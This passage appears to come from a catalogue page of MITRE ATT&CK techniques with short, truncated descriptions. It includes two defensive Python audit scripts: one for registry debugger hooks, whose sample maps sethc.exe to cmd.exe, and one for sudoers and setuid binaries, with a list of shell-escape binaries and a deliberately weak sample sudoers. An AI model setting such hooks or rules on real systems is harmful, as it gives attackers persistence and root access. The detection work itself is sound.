Persistence: Launch Agent
Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process …
T1543.002
Persistence: Systemd Service
Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used …
T1543.003
Persistence: Windows Service
Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications …
T1543.004
Persistence: Launch Daemon
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, …
T1543.005
Persistence: Container Service
Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for …
T1546.017
Persistence: Udev Rules
Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles …
T1546.018
Persistence: Python Startup Hooks
Adversaries may achieve persistence by leveraging Python’s startup mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py` or `usercustomize.py` modules. These files are automatically processed …
T1547
Persistence: Boot or Logon Autostart Execution
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. …
T1547.001
Persistence: Registry Run Keys / Startup Folder
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the …
T1547.002
Persistence: Authentication Package
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process …
T1547.003
Persistence: Time Providers
Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft …
T1547.004
Persistence: Winlogon Helper DLL
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at …
T1547.005
Persistence: Security Support Provider
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) …
T1547.006
Persistence: Kernel Modules and Extensions
Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and …
T1547.007
Persistence: Re-opened Applications
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS …
T1547.008
Persistence: LSASS Driver
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and …
T1547.009
Persistence: Shortcut Modification
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference …
T1547.010
Persistence: Port Monitors
Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set …
T1547.011
Persistence: Plist Modification
Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to …
T1547.012
Persistence: Print Processors
Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by …
T1547.013
Persistence: XDG Autostart Entries
Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart …
T1547.014
Persistence: Active Setup
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is …
T1547.015
Persistence: Login Items
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections …
T1554
Persistence: Compromise Host Software Binary
Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and …
T1574
Persistence: Hijack Execution Flow
Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, …
T1574.001
Persistence: DLL
Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data …
T1574.002
Persistence: DLL Side-Loading
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just …
T1574.004
Persistence: Dylib Hijacking
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at …
T1574.005
Persistence: Executable Installer File Permissions Weakness
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of …
T1574.006
Persistence: Dynamic Linker Hijacking
Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of …
T1574.007
Persistence: Path Interception by PATH Environment Variable
Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User …
T1574.008
Persistence: Path Interception by Search Order Hijacking
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs …
T1574.009
Persistence: Path Interception by Unquoted Path
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing …
T1574.010
Persistence: Services File Permissions Weakness
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to …
T1574.011
Persistence: Services Registry Permissions Weakness
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Flaws in the permissions for Registry keys related to services …
T1574.012
Persistence: COR_PROFILER
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework …
T1574.013
Persistence: KernelCallbackTable
Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher …
T1574.014
Persistence: AppDomainManager
Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and …
T1653
Persistence: Power Settings
Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a …
T1668
Persistence: Exclusive Control
Adversaries who successfully compromise a system may attempt to maintain persistence by “closing the door” behind them – in other words, by preventing other threat …
T1671
Persistence: Cloud Application Integration
Adversaries may achieve persistence by leveraging OAuth application integrations in a software-as-a-service environment. Adversaries may create a custom application, add a legitimate application into the …
T1068
Privilege Escalation: Exploitation for Privilege Escalation
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming …
T1166
Privilege Escalation: Setuid and Setgid
When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges …
T1169
Privilege Escalation: Sudo
The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other …
T1178
Privilege Escalation: SID-History Injection
The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security …
T1183
Privilege Escalation: Image File Execution Options Injection
Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an …
T1206
Privilege Escalation: Sudo Caching
The <code>sudo</code> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) …
T1514
Privilege Escalation: Elevated Execution with Prompt
Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give …
T1546
Privilege Escalation: Event Triggered Execution
Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and …
T1546.001
Privilege Escalation: Change Default File Association
Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open …
T1546.002
Privilege Escalation: Screensaver
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and …
T1546.003
Privilege Escalation: Windows Management Instrumentation Event Subscription
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to …
T1546.004
Privilege Escalation: Unix Shell Configuration Modification
Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the …
T1546.005
Privilege Escalation: Trap
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will …
T1546.006
Privilege Escalation: LC_LOAD_DYLIB Addition
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used …
T1546.007
Privilege Escalation: Netsh Helper DLL
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used …
T1546.008
Privilege Escalation: Accessibility Features
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a …
T1546.009
Privilege Escalation: AppCert DLLs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in …
T1546.010
Privilege Escalation: AppInit DLLs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in …
T1546.011
Privilege Escalation: Application Shimming
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created …
T1546.012
Privilege Escalation: Image File Execution Options Injection
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach …
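An offline audit for the IFEO hooks described above, added for this page as an example (not MITRE's code). It parses the text written by `reg export` for the Image File Execution Options key and, because the related `SilentProcessExit` key sits beside it rather than under it, assumes that key was exported too and the two files concatenated; `reg export` writes UTF-16LE, so decode before parsing. `REG_SAMPLE` is constructed for the example; its `sethc.exe` entry is the shape an Accessibility Features hijack (T1546.008) takes when done through IFEO.

```python
"""Audit a .reg export for T1546.012 Image File Execution Options hooks.

Added example for this page, not MITRE's code. It expects the text produced by
`reg export` of the Image File Execution Options key and, because the related
SilentProcessExit key lives beside it rather than under it, of that key too,
concatenated into one file (reg export writes UTF-16LE; decode before parsing).
REG_SAMPLE is constructed for the example and not taken from a real host.
"""
import re

FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200  # GlobalFlag bit that arms SilentProcessExit

_KEY = re.compile(r"^\[(?P<key>[^\]]+)\]\s*$")
_VALUE = re.compile(r'^"(?P<name>[^"]+)"=(?P<raw>.*)$')

REG_SAMPLE = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"UseFilter"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe]
"ReportingMode"=dword:00000001
"MonitorProcess"="C:\\Users\\Public\\svc.exe"
"""


def decode_value(raw):
    """Decode the .reg encodings this audit needs: quoted strings and dword:hex.
    Other types (hex:, hex(7): ...) are returned as the raw text."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    return raw


def parse_reg(text):
    """Return {key_path: {value_name: value}} for a reg export."""
    keys, current = {}, None
    for line in text.splitlines():
        m = _KEY.match(line)
        if m:
            current = m.group("key")
            keys.setdefault(current, {})
            continue
        m = _VALUE.match(line)
        if m and current is not None:
            keys[current][m.group("name")] = decode_value(m.group("raw"))
    return keys


def audit_ifeo(text):
    """Return (image, indicator, value) for every IFEO Debugger, for GlobalFlag
    values that arm SilentProcessExit, and for SilentProcessExit MonitorProcess."""
    findings = []
    for key, values in parse_reg(text).items():
        image = key.rsplit("\\", 1)[-1]
        if "Debugger" in values:
            findings.append((image, "Debugger", values["Debugger"]))
        flag = values.get("GlobalFlag")
        if isinstance(flag, int) and flag & FLG_MONITOR_SILENT_PROCESS_EXIT:
            findings.append((image, "GlobalFlag", hex(flag)))
        if "\\SilentProcessExit\\" in key and "MonitorProcess" in values:
            findings.append((image, "MonitorProcess", values["MonitorProcess"]))
    return findings


if __name__ == "__main__":
    for image, indicator, value in audit_ifeo(REG_SAMPLE):
        print(f"{image}: {indicator} = {value}")
```

A `Debugger` value is not malicious by itself (developer machines legitimately register a just-in-time debugger), so the output is a review list: compare each value against the debuggers you expect on that host, and treat any `Debugger` on a binary reachable from the logon screen, or any `MonitorProcess` pointing into a user-writable directory, as a priority.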
T1546.013
Privilege Escalation: PowerShell Profile
Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when …
T1546.014
Privilege Escalation: Emond
Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts …
T1546.015
Privilege Escalation: Component Object Model Hijacking
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to …
T1546.016
Privilege Escalation: Installer Packages
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain …
T1548
Privilege Escalation: Abuse Elevation Control Mechanism
Adversaries may circumvent mechanisms designed to control elevated privileges in order to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to …
T1548.001
Privilege Escalation: Setuid and Setgid
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and …
T1548.002
Privilege Escalation: Bypass User Account Control
Adversaries may bypass UAC mechanisms to elevate process privileges on a system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as …
T1548.003
Privilege Escalation: Sudo and Sudo Caching
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn …
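An audit covering the two Unix elevation paths listed above, Setuid and Setgid (T1548.001) and Sudo and Sudo Caching (T1548.003), added for this page as an example; it is not MITRE's code. `SUDOERS_SAMPLE` is a constructed `/etc/sudoers`. The setuid check is split into a pure function over `(path, st_mode)` pairs, so it can be exercised without root, and a walker that feeds it a real directory tree; the `SHELL_ESCAPES` list is a small, hand-picked set and not exhaustive.

```python
"""Audit sudoers rules and setuid/setgid binaries (T1548.001, T1548.003).

Added example for this page, not MITRE's code. SUDOERS_SAMPLE is a constructed
/etc/sudoers; flag_setuid() is a pure check over (path, st_mode) pairs so it can
be tested without root, and scan_setuid() feeds it a real directory tree.
"""
import os
import re
import stat

# Binaries with well-known shell escapes: granting them via sudo grants a root shell.
SHELL_ESCAPES = {"vim", "vi", "less", "more", "find", "awk", "python3", "perl",
                 "rsync", "tar", "env", "bash", "sh"}

# user/%group  host=(runas) TAG: cmd, cmd ...
_RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmds>.+)$")

SUDOERS_SAMPLE = """\
# /etc/sudoers (constructed sample)
Defaults    env_reset
Defaults    timestamp_timeout=-1
Defaults    !tty_tickets
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app, \\
        /usr/bin/vim
backup  ALL=(ALL) /usr/bin/rsync
"""


def logical_lines(text):
    """Drop comments and blanks, join backslash-continued lines."""
    buf = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if s.endswith("\\"):
            buf.append(s[:-1].strip())
            continue
        buf.append(s)
        yield " ".join(buf)
        buf = []


def audit_sudoers(text):
    """Return (principal, finding, line) for settings that weaken sudo's password
    check or hand a non-root principal an easy path to root."""
    findings = []
    for line in logical_lines(text):
        if line.startswith("Defaults"):
            if re.search(r"timestamp_timeout\s*=\s*-1\b", line):
                findings.append(("Defaults", "cached credentials never expire", line))
            if re.search(r"!tty_tickets\b", line):
                findings.append(("Defaults", "credential cache shared across ttys", line))
            continue
        m = _RULE.match(line)
        if not m or m.group("who") == "root":
            continue
        who, tags, cmds = m.group("who"), m.group("tags"), m.group("cmds").strip()
        if "NOPASSWD:" in tags:
            findings.append((who, "NOPASSWD rule", line))
        if cmds == "ALL":
            findings.append((who, "all commands permitted", line))
            continue
        for cmd in cmds.split(","):
            binary = os.path.basename(cmd.split()[0]) if cmd.strip() else ""
            if binary in SHELL_ESCAPES:
                findings.append((who, f"shell escape via {binary}", line))
    return findings


def flag_setuid(entries, trusted=frozenset()):
    """entries: iterable of (path, st_mode). Return (path, bits) for regular files
    carrying setuid and/or setgid that are not on the trusted allow-list."""
    flagged = []
    for path, mode in entries:
        if not stat.S_ISREG(mode) or path in trusted:
            continue
        bits = [name for name, bit in (("setuid", stat.S_ISUID), ("setgid", stat.S_ISGID))
                if mode & bit]
        if bits:
            flagged.append((path, "+".join(bits)))
    return flagged


def scan_setuid(root="/usr", trusted=frozenset()):
    """Walk a real tree with lstat (symlinks not followed) and hand it to flag_setuid."""
    def entries():
        for dirpath, _, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    yield path, os.lstat(path).st_mode
                except OSError:
                    continue
    return flag_setuid(entries(), trusted)


if __name__ == "__main__":
    for who, what, line in audit_sudoers(SUDOERS_SAMPLE):
        print(f"{who}: {what}: {line}")
```

The two `Defaults` findings are the caching half of the technique: `timestamp_timeout=-1` keeps a sudo ticket valid until reboot, and `!tty_tickets` lets a ticket obtained in one terminal be reused from any other, so a process running as that user can call `sudo` without a prompt. The `%sudo ... ALL` line is the distribution default on many systems and is reported so the group's membership gets reviewed, not because the line itself is wrong. For the setuid side, seed `trusted` from the package manager's file list and look at whatever is left.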
T1548.004
Privilege Escalation: Elevated Execution with Prompt
Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give …
T1548.005
Privilege Escalation: Temporary Elevated Cloud Access
Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or …
T1611
Privilege Escalation: Escape to Host
Adversaries may break out of a container or virtualized environment to gain access to the underlying host. This can allow an adversary access to other …
T1589
Reconnaissance: Gather Victim Identity Information
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal …
T1589.001
Reconnaissance: Credentials
Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization …
T1589.002
Reconnaissance: Email Addresses
Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for …
T1589.003
Reconnaissance: Employee Names
Adversaries may gather employee names that can be used during targeting. Employee names may be used to derive email addresses as well as to help guide …
T1590
Reconnaissance: Gather Victim Network Information
Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative …
T1590.001
Reconnaissance: Domain Properties
Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety …
T1590.002
Reconnaissance: DNS
Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name …
T1590.003
Reconnaissance: Network Trust Dependencies
Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of …
T1590.004
Reconnaissance: Network Topology
Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, …
T1590.005
Reconnaissance: IP Addresses
Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a …
T1590.006
Reconnaissance: Network Security Appliances
Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety …
T1591
Reconnaissance: Gather Victim Org Information
Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including …
T1591.001
Reconnaissance: Determine Physical Locations
Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety …
T1591.002
Reconnaissance: Business Relationships
Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety …
T1591.003
Reconnaissance: Identify Business Tempo
Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety …
T1591.004
Reconnaissance: Identify Roles
Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a …
T1592
Reconnaissance: Gather Victim Host Information
Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative …
T1592.001
Reconnaissance: Hardware
Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details …
T1592.002
Reconnaissance: Software
Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details …
T1592.003
Reconnaissance: Firmware
Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details …
T1592.004
Reconnaissance: Client Configurations
Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details …
T1593
Reconnaissance: Search Open Websites/Domains
Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in …
T1593.001
Reconnaissance: Social Media
Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim …
T1593.002
Reconnaissance: Search Engines
Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typically crawl online sites to index …
T1593.003
Reconnaissance: Code Repositories
Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party …
T1594
Reconnaissance: Search Victim-Owned Websites
Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including …
T1595
Reconnaissance: Active Scanning
Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure …
T1595.001
Reconnaissance: Scanning IP Blocks
Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, …
T1595.002
Reconnaissance: Vulnerability Scanning
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software …
T1595.003
Reconnaissance: Wordlist Scanning
Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://attack.mitre.org/techniques/T1110), its goal is the identification of …
T1596
Reconnaissance: Search Open Technical Databases
Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online …
T1596.001
Reconnaissance: DNS/Passive DNS
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered …
T1596.002
Reconnaissance: WHOIS
Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) …
T1596.003
Reconnaissance: Digital Certificates
Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority …
T1596.004
Reconnaissance: CDNs
Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a …
T1596.005
Reconnaissance: Scan Databases
Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of …
T1597
Reconnaissance: Search Closed Sources
Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. …
T1597.001
Reconnaissance: Threat Intel Vendors
Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or …
T1597.002
Reconnaissance: Purchase Technical Data
Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources …
T1598
Reconnaissance: Phishing for Information
Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into …
T1598.001
Reconnaissance: Spearphishing Service
Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to …
T1598.002
Reconnaissance: Spearphishing Attachment
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt …
T1598.003
Reconnaissance: Spearphishing Link
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt …
T1598.004
Reconnaissance: Spearphishing Voice
Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into …
T1681
Reconnaissance: Search Threat Vendor Data
Threat actors may seek information/indicators from closed or open threat intelligence sources gathered about their own campaigns, as well as those conducted by other adversaries …
T1583
Resource Development: Acquire Infrastructure
Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary …
T1583.001
Resource Development: Domains
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. …
T1583.002
Resource Development: DNS Server
Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic …
T1583.003
Resource Development: Virtual Private Server
Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual …
T1583.004
Resource Development: Server
Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and …
T1583.005
Resource Development: Botnet
Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems …
T1583.006
Resource Development: Web Services
Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based …
T1583.007
Resource Development: Serverless
Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. …
T1583.008
Resource Development: Malvertising
Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position …
T1584
Resource Development: Compromise Infrastructure
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and …
T1584.001
Resource Development: Domains
Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain …
T1584.002
Resource Development: DNS Server
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for …
T1584.003
Resource Development: Virtual Private Server
Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell …
T1584.004
Resource Development: Server
Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During …
T1584.005
Resource Development: Botnet
Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that …
T1584.006
Resource Development: Web Services
Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register …
T1584.007
Resource Development: Serverless
Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing …
T1584.008
Resource Development: Network Devices
Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where …
T1585
Resource Development: Establish Accounts
Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a …
T1585.001
Resource Development: Social Media Accounts
Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to …
T1585.002
Resource Development: Email Accounts
Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as …
T1585.003
Resource Development: Cloud Accounts
Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud …
T1586
Resource Development: Compromise Accounts
Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be …
T1586.001
Resource Development: Social Media Accounts
Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be …
T1586.002
Resource Development: Email Accounts
Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them …
T1586.003
Resource Development: Cloud Accounts
Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage …
T1587
Resource Development: Develop Capabilities
Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. …
T1587.001
Resource Development: Malware
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, …
T1587.002
Resource Development: Code Signing Certificates
Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to …
T1587.003
Resource Development: Digital Certificates
Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, …
T1587.004
Resource Development: Exploits
Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or …
T1588
Resource Development: Obtain Capabilities
Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or …
T1588.001
Resource Development: Malware
Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 …
T1588.002
Resource Development: Tool
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A …
T1588.003
Resource Development: Code Signing Certificates
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts …
T1588.004
Resource Development: Digital Certificates
